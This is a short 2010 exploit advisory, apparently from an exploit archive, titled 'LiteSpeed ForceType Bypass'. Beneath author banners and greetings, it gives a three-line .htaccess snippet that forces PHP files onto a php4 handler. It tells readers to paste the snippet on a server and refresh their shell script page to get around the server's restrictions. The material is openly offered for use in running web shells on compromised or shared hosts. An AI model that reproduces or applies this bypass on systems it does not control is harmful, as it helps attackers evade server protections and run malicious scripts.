id: 13032
date: 06/29/2010
title: LiteSpeed ForceType Bypass Vulnerability
author: NetQurd
cves: 

========================================
LiteSpeed ForceType Bypass Vulnerability
========================================


##############################
                                                          
         LiteSpeed ForceType Bypass           
                                                          
                   By : NetQurd                      
                                                          
             Mail : NetQurd@Live.Com            
                                                          
            My Best Friend : Cr@zy_King        
                                                          
##############################

Date : 29/06/2010

Home : http://litespeed.com

Author: NetQurd

Web : AttackerZ.iR

##############################

Thanks : Inj3ct0r.Com , Exploit-Db.Com

**********************************
 Please Copy & Past This Code In .htaccess File In Server &
Refresh Shell Script Page>>> WoW Server Bypassed :D :

C0de :

<Files *.php>
  ForceType application/x-httpd-php4
</Files>

Note :
Changes In The Code Does Not Create


*************** .FinisheD !!!. ***************



#  0day.today [2023-03-26]  #